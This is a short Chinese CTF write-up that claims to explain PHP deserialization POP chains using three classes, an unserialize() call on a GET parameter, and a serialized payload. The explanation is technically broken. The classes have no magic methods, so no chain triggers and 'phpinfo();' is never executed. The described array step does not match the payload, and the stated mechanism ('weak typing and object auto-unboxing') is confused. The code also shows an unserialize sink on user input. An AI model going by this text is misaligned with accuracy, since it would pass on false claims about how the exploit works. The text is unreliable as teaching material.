CTF-PHP反序列化漏洞4-实例理解POP链(经典赛题)

在CTF-PHP反序列化漏洞中，POP链是一种常见的攻击技巧。它利用PHP的弱类型和对象自动拆箱的特性，通过构造一条恶意的对象属性访问链，最终实现代码执行。下面我们来分析一道经典的POP链赛题，深入理解POP链的实现原理。

题目描述：

给定以下代码，构造一条POP链并实现代码执行：

```
class A{
public $a;
function __construct(){
$this->a = new B();
}
}

class B{
public $b;
function __construct(){
$this->b = new C();
}
}

class C{
public $c;
function __construct(){
$this->c = "phpinfo();";
}
}

if(isset($_GET['code'])){
unserialize($_GET['code']);
}
```

题目分析：

根据上述代码，我们可以构造一个POP链，使得在反序列化时，先访问A类的成员变量a，再访问B类的成员变量b，最后访问C类的成员变量c，从而执行恶意代码。具体实现步骤如下：

1. 构造一个字符串，作为C类的成员变量c的值，以“;”结尾，其中包含需要执行的命令，比如“phpinfo();”。

2. 构造一个数组，将C类的成员变量c的值放入数组中。

3. 构造一个B类的对象，将上一步中的数组作为B类的成员变量b的值。

4. 构造一个A类的对象，将上一步中的B类对象作为A类的成员变量a的值。

5. 序列化上一步中的A类对象，并将结果作为参数传入反序列化函数unserialize()中，即可触发POP链执行代码。

攻击 payload：

利用以上分析得到的构造方法，构造恶意 payload 如下：

```
O:1:"A":1:{s:1:"a";O:1:"B":1:{s:1:"b";O:1:"C":1:{s:1:"c";s:10:"phpinfo();";}}}
```

将以上 payload 作为 code 参数发起 GET 请求，即可成功触发POP链并执行恶意代码。

总结：

POP链是一种通用的攻击技巧，常见于PHP反序列化漏洞的利用过程中。通过构造特定的成员变量访问链，可实现任意代码执行。对于安全人员而言，深入理解POP链的实现原理，有助于更好地理解反序列化漏洞的利用方式，从而更好地对此类漏洞进行防护和修复。